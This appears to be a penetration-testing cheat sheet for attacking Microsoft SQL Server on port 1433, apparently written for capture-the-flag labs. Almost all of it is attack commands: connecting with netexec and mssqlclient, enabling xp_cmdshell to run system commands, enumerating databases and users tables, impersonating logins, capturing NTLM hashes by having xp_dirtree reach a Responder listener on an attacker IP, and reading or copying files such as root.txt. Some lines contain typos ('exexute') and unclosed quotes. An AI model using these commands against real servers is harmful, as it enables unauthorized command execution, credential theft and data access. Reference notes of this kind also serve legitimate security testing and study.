MSSQL <tcp 1433>

netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami"

mssqlclient.py -p 1433 domain.local/adot8:password@10.10.10.101 -windows-auth

Configure xp_cmdshell

sp_configure 'show advanced options', '1';
RECONFIGURE;
sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
xp_cmdshell 'whoami;

exexute sp_configure 'show advanced options', '1';
RECONFIGURE;
exexute sp_configure 'xp_cmdshell', '1';
RECONFIGURE;
exexute xp_cmdshell 'whoami;

Enumeration

select @@version;
SELECT name FROM sys.databases;
SELECT name FROM master..sysdatabases;
USE adot8;
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
SELECT name FROM <databaseName>..sysobjects WHERE xtype = 'U';    <-- find users table
select * from <databaseName>.dbo.users;
select * from <databaseName>..users;

Impersonate a user

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

enum_impersonate
exec_as_user <grantor>
exec_as_login <grantor>

Capture hash

sudo responder -I tun0
xp_dirtree \\10.10.14.3\adot8\

Read a file

select x from OpenRowset(BULK 'C:\Users\Administrator\root.txt',SINGLE_CLOB) R(x)

Copy a file

create table #errortable (ignore int)

bulk insert #errortable from '\\localhost\c$\windows\win.ini' with ( fieldterminator=',', rowterminator='\n', errorfile='c:\thatjusthappend.txt' )

PreviousMySQL<tcp 3306>NextSMTP <tcp 25>

Last updated 6 months ago